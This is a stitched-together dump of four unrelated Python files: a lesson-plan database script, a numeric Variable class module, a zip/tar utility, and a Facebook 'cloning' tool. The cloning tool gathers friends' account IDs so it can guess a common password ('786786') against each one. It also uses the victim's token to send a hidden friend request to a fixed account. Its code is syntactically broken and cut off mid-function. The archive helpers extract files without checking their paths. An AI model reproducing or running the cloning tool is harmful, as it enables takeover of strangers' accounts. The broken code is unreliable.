] | permissive | mwbetrg/skripbatak | da5410a3be83393957d32ad53991466244757185 | 4565e26cf9e3c40c0b38374d8dd07ae7313f5899 | refs/heads/master | 2021-01-19T01:39:25.516181 | 2017-01-18T23:12:29 | 2017-01-18T23:12:29 | 42,288,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,291 | py | #qpy:console
import site
import os
from peewee import *
import time
import datetime
import io
import sys
# 20160103
if os.path.exists('/storage/extSdCard'):
db = SqliteDatabase('/storage/extSdCard/mydb/lessonplan2010.db', **{})
#backupdir = '/storage/extSdCard/dbbackup/'
#db = '/storage/extSdCard/mydb/english-notes-exercises.sqlite'
else:
db = SqliteDatabase('lessonplan2010.db', **{})
#db = SqliteDatabase('lessonplan2010.db', **{})
#db = SqliteDatabase('/storage/extSdCard/englishdb/lessonplan2010.db', **{})
class BaseModel(Model):
class Meta:
database = db
class Lessonplan2016(BaseModel):
activity1 = CharField(null=True)
activity2 = CharField(null=True)
assimilation = CharField(null=True)
content = CharField(null=True)
date = IntegerField(null=True)
duration = CharField(null=True)
exercise = TextField(null=True)
handout = TextField(null=True)
impact = CharField(null=True)
lo1 = CharField(null=True)
lo2 = CharField(null=True)
lo3 = CharField(null=True)
note = CharField(null=True)
theme = CharField(null=True)
timeend = CharField(null=True)
timestart = CharField(null=True)
tingkatan = CharField(null=True)
topic = CharField(null=True)
week = CharField(null=True)
class Meta:
db_table = 'lessonplan2016'
class Lessonplanbank(BaseModel):
activity1 = CharField(null=True)
activity2 = CharField(null=True)
assimilation = CharField(null=True)
bank = PrimaryKeyField(db_column='bank_id', null=True)
content = CharField(null=True)
duration = CharField(null=True)
exercise = TextField(null=True)
handout = TextField(null=True)
impact = CharField(null=True)
level = CharField(null=True)
lo1 = CharField(null=True)
lo2 = CharField(null=True)
lo3 = CharField(null=True)
note = CharField(null=True)
theme = CharField(null=True)
tingkatan = CharField(null=True)
topic = CharField(null=True)
week = IntegerField(null=True)
class Meta:
db_table = 'lessonplanbank'
db.connect()
if len(sys.argv) < 4:
print "Begini boh: %s minggu (WW) bulan (MM) hb (DD)" % sys.argv[0]
sys.exit(1)
week = sys.argv[1]
month = sys.argv[2]
hb = int(sys.argv[3])
tahunini = datetime.datetime.now().year
#tahunini = "2015"
tdatesun = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=0)
datesun = tdatesun.strftime('%Y%m%d')
#datesun = (str(tahunini)+str(month)+str(hb))
#-----------------------------------------------------------------------
tdatemon = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=1)
tdatetue = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=2)
tdatewed = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=3)
tdatethu = datetime.datetime(int(tahunini), int(month), int(hb)) + datetime.timedelta(days=4)
datemon = tdatemon.strftime('%Y%m%d')
datetue = tdatetue.strftime('%Y%m%d')
datewed = tdatewed.strftime('%Y%m%d')
datethu = tdatethu.strftime('%Y%m%d')
#-----------------------------------------------------------------------
# Sunday
sun01 = Lessonplan2016.create(tingkatan="6AI3",\
date=int(datesun),\
timestart="0820",\
timeend="1020",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
sun02 = Lessonplan2016.create(tingkatan="6AI5",\
date=datesun,\
timestart="1050",\
timeend="1250",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Monday
mon01 = Lessonplan2016.create(tingkatan="6AI3",\
date=datemon,\
timestart="0900",\
timeend="1100",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
mon02 = Lessonplan2016.create(tingkatan="6BI4",\
date=datemon,\
timestart="1130",\
timeend="1330",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Tuesday
tue01 = Lessonplan2016.create(tingkatan="6AI5",\
date=datetue,\
timestart="0820",\
timeend="1020",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
tue02 = Lessonplan2016.create(tingkatan="6AI3",\
date=datetue,\
timestart="1250",\
timeend="1410",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Wednesday
wed01 = Lessonplan2016.create(tingkatan="6AI5",\
date=datewed,\
timestart="0740",\
timeend="0900",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
wed02 = Lessonplan2016.create(tingkatan="6BI4",\
date=datewed,\
timestart="0940",\
timeend="1100",\
duration="80",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
#-----------------------------------------------------------------------
# Thursday
thu01 = Lessonplan2016.create(tingkatan="6BI4",\
date=datethu,\
timestart="1210",\
timeend="1410",\
duration="120",\
theme="-",\
topic="-",\
lo1="-",\
lo2="-",\
lo3="-",\
content="-",\
activity1="-",\
activity2="-",\
activity3="-",\
assimilation="-",\
impact="-",\
note="-",\
week=week,\
handout="-",\
exercise="-"
)
thisweek = Lessonplan2016.select().where(Lessonplan2016.week == week)
for i in thisweek:
print str(i.date)+" = "+i.timestart
| [
"mwbetrg@gmail.com"
] | mwbetrg@gmail.com |
785561d341540c7549325e56f64e3838bd93b98b | 9f3b43a01f205fb1692cd4e873a5fa4fd2b4d78e | /variable.py | eb6eceee564e253696b79b225e05aa3df7a686a8 | [] | no_license | sourlemon11/curve_synthesis | f88f1eb8da5ff7de79c7da377d3e85265b1f99dd | edc088bd9a3493f08ea6a5aeb2fc88f51231afe7 | refs/heads/master | 2020-04-09T10:22:05.822389 | 2018-12-03T23:46:35 | 2018-12-03T23:46:35 | 160,269,107 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,668 | py | import logging
# import ipdb
from numpy import linspace as np_linspace, round as np_round, array as np_array
from sympy import symbols as sp_symbols
# from collections import ChainMap
# Variable
# --> Contains
# --> ... Range, n_points, linspace
# goes into curve as an class
class Variable():
def __init__(self, symbol, ran=None, val=None, is_const=False, n=None):
logging.debug(f"Running class Variable for {symbol}, range:{ran},\
val:{val}, constant:{is_const}")
self._name = str(symbol)
self._symbol = symbol
self._ran = None if ran is None else tuple(float(x) for x in ran)
logging.debug(f"init range: {self._ran}")
#self._val = ran_or_val if type(ran_or_val) is int or float else None
self._val = None if val is None else float(val)
self._n = n
self._linspace = None
self._is_constant = is_const
@property
def symbol(self):
return self._symbol
@symbol.setter
def symbol(self, s):
self._symbol = s
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def ran(self):
return self._ran
@ran.setter
def ran(self, r: tuple):
if len(r) == 2:
self._ran = (float(x) for x in r)
else:
self._ran = None
@property
def val(self):
return self._val
@val.setter
def val(self, v):
self._val = v
@property
def n(self):
return self._n
@n.setter
def n(self, n):
if (type(n) is int):
self._n = n
else:
raise TypeError("Use an int")
@property
def is_constant(self):
return self._is_constant
@is_constant.setter
def is_constant(self, is_const):
self._is_constant = is_const
@property
def linspace(self):
if type(self.ran) is tuple:
try:
logging.debug(f"using ran: {self.ran}, type {type(self.ran[0])} for linspace")
self._linspace = np_round(
np_linspace(self.ran[0],
self.ran[-1],
self.n), decimals=3)
logging.debug(f"running linspace for {self.name}, if linspace: {type(self._linspace)}")
except:
raise(ValueError("Could not assign linspace"))
return self._linspace
else:
self._linspace = np_array(self.val)
return self._linspace
@linspace.setter
def linspace(self, ls:list):
self._linspace = ls
class Variables():
"""
Args:
"""
def __init__(self, Vars):
# Reimpliment Chainmap init
#self.maps = list(maps) or [{}] # always at least one map
key_names = [v.name for v in Vars]
self._Vars = dict(zip(key_names, Vars))
self.index = 0
self._constant_var = None
self._any_constant = False
self._check_any_constant()
# def __getattr__(self, name):
# """Override to get a variable name based on attribute from the dict Vars"""
# attr = self.Vars[name]
# return attr
@property
def Vars(self):
return self._Vars
@property
def constant_var(self):
return self._constant_var
@constant_var.setter
def constant_var(self, v):
self._constant_var = v
@property
def any_constant(self):
return self._any_constant
@any_constant.setter
def any_constant(self, d):
self._any_constant = d
def __iter__(self):
self.index = 0
return self
def __next__(self):
if(self.index == len(self.Vars)):
raise StopIteration
else:
V = list(self.Vars.values())[self.index]
self.index += 1
return V
def _check_any_constant(self):
runs = 0
def check_constant(m):
nonlocal runs
runs+=1
if m.is_constant is True:
if self.any_constant is True:
raise RuntimeError("Can only have one constant variable!")
else:
logging.debug(f"check_any_constant: constant var is {m.name}")
self.constant_var = m
return True
def check_all(maps):
if(any([check_constant(m) for m in maps])):
return True
if(type(self.Vars) is dict):
if check_all(list(self.Vars.values())):
self.any_constant = True
return True
else: return False
| [
"soneen11@yahoo.com"
] | soneen11@yahoo.com |
566bdadc52d20472b63a9220e98e6d64c70af204 | 12fb02e7d946002beee4e095ea23f4d98c968afa | /tscripts/yunwei/operate/compress.py | 2322013f32616938001a146dfb17314ba7e2ad9c | [] | no_license | cash2one/yunwei-1 | 0ab4ec0783c061739dc9a6c3db2f9379605746fd | b929fe23fd95ea1f18bd809b82523101eb414309 | refs/heads/master | 2020-07-02T14:31:00.776030 | 2016-09-09T05:31:52 | 2016-09-09T05:31:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
date: 2016/08/20
role: 压缩解压
usage: cmb = compressBase(log_path) 实例化
cmb.zipp(source_dir,zipfile_path)
cmb.tar(source_dir,tarfile_path)
cmb.unzip(zipfile_path,target_dir)
cmb.untar(tarfile_path,target_dir)
'''
from __future__ import absolute_import
from yunwei.operate.prefix import log
logIns = log('117')
import os,zipfile,tarfile
###压缩解压操作类
class compressBase:
def __init__(self,log_path):
###log_path为日志写入文件
logIns = log('117',log_path)
self.zf = ''
###析构函数
def __del__(self):
try:
self.zf.close()
except:
pass
###zip压缩
def zipp(self,source_dir,zipfile_path):
###判断文件或目录是否存在
if not os.path.exists(source_dir):
logIns.writeLog('error','%s not exists' %source_dir)
raise ValueError('117,%s not exists' %source_dir)
###循环把文件加入列表
file_list = []
if os.path.isfile(source_dir):
file_list.append(source_dir)
else:
for root, dirs, files in os.walk(source_dir):
for name in files:
file_list.append(os.path.join(root, name))
###调用zipfile模块
self.zf = zipfile.ZipFile(zipfile_path, "w", zipfile.zlib.DEFLATED)
for file_one in file_list:
arc_name = file_one[len(source_dir):]
self.zf.write(file_one,arc_name)
###解压zip
def unzip(self,zipfile_path, unzip_dir):
if not os.path.exists(unzip_dir):
os.makedirs(unzip_dir, 0777)
self.zf = zipfile.ZipFile(zipfile_path)
for name in self.zf.namelist():
name = name.replace('\\','/')
if name.endswith('/'):
os.makedirs(os.path.join(unzip_dir, name))
else:
ext_file = os.path.join(unzip_dir, name)
ext_dir = os.path.dirname(ext_file)
if not os.path.exists(ext_dir) :
os.makedirs(ext_dir,0777)
with open(ext_file, 'wb') as ef:
ef.write(self.zf.read(name))
###tar压缩
def tar(self,source_dir,tarfile_path):
###判断文件或目录是否存在
if not os.path.exists(source_dir):
logIns.writeLog('error','%s not exists' %source_dir)
raise ValueError('117,%s not exists' %source_dir)
###调用tarfile模块
self.zf = tarfile.open(tarfile_path, "w:gz")
###判断源目录长度
len_source = len(source_dir)
###循环把文件加入列表
for root, dirs, files in os.walk(source_dir):
for name in files:
full_path = os.path.join(root,name)
self.zf.add(full_path,arcname=os.path.join(root[len_source:],name))
###解压tar
def untar(self,tarfile_path, untar_dir):
if not os.path.exists(untar_dir):
os.makedirs(untar_dir, 0777)
try:
self.zf = tarfile.open(tarfile_path, "r:gz")
file_names = self.zf.getnames()
for file_name in file_names:
self.zf.extract(file_name, untar_dir)
except Exception, e:
logIns.writeLog('error','%s untar error' %tarfile_path)
raise ValueError('error','%s untar error' %tarfile_path)
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
d453bb040eec2a67cd33c35cefc09e5e6a3f1346 | 63b54bfcdd36ac1a0046f2ca4c639d18942c2697 | /123.py | 2fdfb6e0a78c83b3d0d6720d11cd61295d9a9036 | [] | no_license | chandioboss/janu | 898e12498ef17cee33c8ba9c760016ccae33d64a | 5c82db8cc618381c4f175f14b4281e7780eff581 | refs/heads/master | 2022-05-24T05:36:13.134166 | 2020-04-19T11:27:59 | 2020-04-19T11:27:59 | 256,958,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 35,437 | py | #!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To IBRAHIM CHANDIO
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.07)
#Dev:ibrahim_chandio
##### LOGO #####
logo = """
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎\033[1;91m IBRAHIM CH 11 \033[1;95m⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ \033[1;91m✬✬🄵🄰🄲🄴🄱🄾🄾🄺✬✬ \033[1;95m⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎•◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ •◈••◈•
\033[1;95m:•◈•⸎ ⸎ ⸎⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ ⸎ •◈••◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;93m-Kali.linux-\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•
\033[1;91m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;91m•◈•▀██▄██▀\033[1;93m•◈•WhatsApp Number +923009232856•\033[1;91m▀██▄██▀▀██•◈•
\033[1;91m•◈•▀██▄██▀\033[1;93m•◈•IBRAHIM CHANDIO ASH Cloning•\033[1;91m▀██▄██▀▀██•◈•
\033[1;91m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;93mKali.linux\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m╔★═█ \033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m🆁═══════╬█║▷\033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m╚═█████▓▒█▒▓█████║〓\033[1;91m┈┈┈┈┈\033[1;92m▷Z K TECH
\033[1;91m ┈┈┈┈┈┈┈┈┈┈\033[1;92m○°◢███◤✇═╩═╩═╝╯🄵\033[1;91m┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈┈\033[1;92m◢███◤✬🄵🄰🄲🄴🄱🄾🄾🄺✬\033[1;91m┈┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈ \033[1;92m████║○○○○\033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈─────┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;93m•◈••◈••◈••◈••◈••◈••◈••◈•\033[1;92mWelcome To Kali.linux\033[1;93m•◈••◈••◈••◈••◈••◈••◈••◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;96mKali.linux\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•
\033[1;94m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀█\033[1;91m【I】【B】【R】【A】-【H】【I】【M】【A】【S】【H】\033[1;94m███▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀██\033[1;91m....03125939861....\033[1;94m█▀▀██▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIBRAHIM_X_ASH\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"""
jalan(' \033[1;96m▀██▄██▀▀██▄██▀...IBRAHIM.ASH....▀██▄██▀▀██▄██▀.:')
jalan("\033[1;92m ▀██▄██▀▀██▄██▀•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•▀██▄██▀▀██▄██▀ ")
jalan('\033[1;93m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈ ')
jalan('\033[1;93m ┈┈┈┈┈┈\033[1;91m【I】【B】【R】【A】【H】【I】【M】【J】【I】\033[1;93m┈┈┈┈┈┈ ')
jalan("\033[1;93m ┈┈┈┈┈┈\033[1;91m.....03125939861....\033[1;93m┈┈┈┈┈┈┈┈┈ ")
jalan("\033[1;93m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈")
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mLogin IBRAHIM.ASH\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
CorrectUsername = "Ibrahim"
CorrectPassword = "Ashraf"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;92m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:IBRAHIM_CHANDIO
time.sleep(2)
loop = 'false'
else:
print "\033[1;93mWrong Password"
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA')
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;91mWarning: \033[1;94mDo Not Use Your Personal Account' )
jalan(' \033[1;91m Note: \033[1;94mUse a New Account To Login' )
jalan(' \033[1;91mWarning: \033[1;94mlogin sy pehly Indonaeia ki proxy connect kr lein' )
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIBRAHIM.CHANDIO\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print(' \033[1;94m♡\x1b[1;91m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m♡' )
print(' ' )
id = raw_input('\033[1;96m[+] \x1b[1;92mID/Email\x1b[1;95m: \x1b[1;93m')
pwd = raw_input('\033[1;96m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;92mLogin Successful.•◈•..'
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA/')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;93mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;94mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") # Dev:ibrahim_ash
print logo
print " \033[1;92m«----•◈••◈•----\033[1;93mLogged in User Info\033[1;92m----•◈••◈•-----»"
print " \033[1;91m Name\033[1;93m:\033[1;92m"+nama+"\033[1;93m
print " \033[1;91m ID\033[1;93m:\033[1;92m" + id + "\x1b[1;93m
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIbrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print "\033[1;97m-•◈•-\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91mExit
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers == "":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers == "1":
super()
elif unikers == "0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError
print "\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;95mClone From Friend List👬."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;95mClone From Public ID👨👨👦👦."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;91m0.\033[1;94mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;94mChoose an Option>>> \033[1;97m")
if peak == "":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak == "1":
os.system('clear')
print logo
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
jalan('\033[1;95mGetting IDs \033[1;93m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token=" + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id']
elif peak == "2"
os.system('clear')
print logo
idt = raw_input("\033[1;96m[•◈•] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
try:
jok = requests.get("https://graph.facebook.com/" + idt + "?access_token=" + toket)
op = json.loads(jok.text)
print "\033[1;93mName\033[1;93m:\033[1;97m " + op["name"]
except KeyError:
print "\x1b[1;92mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
print "\033[1;93mGetting IDs\033[1;92m..."
r = requests.get("https://graph.facebook.com/" + idt + "/friends?access_token=" + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak == "0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m" + str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m" + o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m«--•◈••◈•---\x1b[1;93m•◈•Stop Process Press CTRL+Z•◈•\033[1;92m---•◈••◈•-»"
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
jalan(' \033[1;93m........🔎🔎🔎🔎🔎🔎🔎🔎🔎🔎\033[1;94mCloning Start plzzz Wai\033[1;93m🔍🔍🔍🔍🔍🔍🔍🔍🔍🔍........ ')
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mKali.linux\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
def main(arg):
global cekpoint, oks
user = arg
try:
os.mkdir('out')
except OSError:
pass # Dev:ibrahim
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = ('786786')
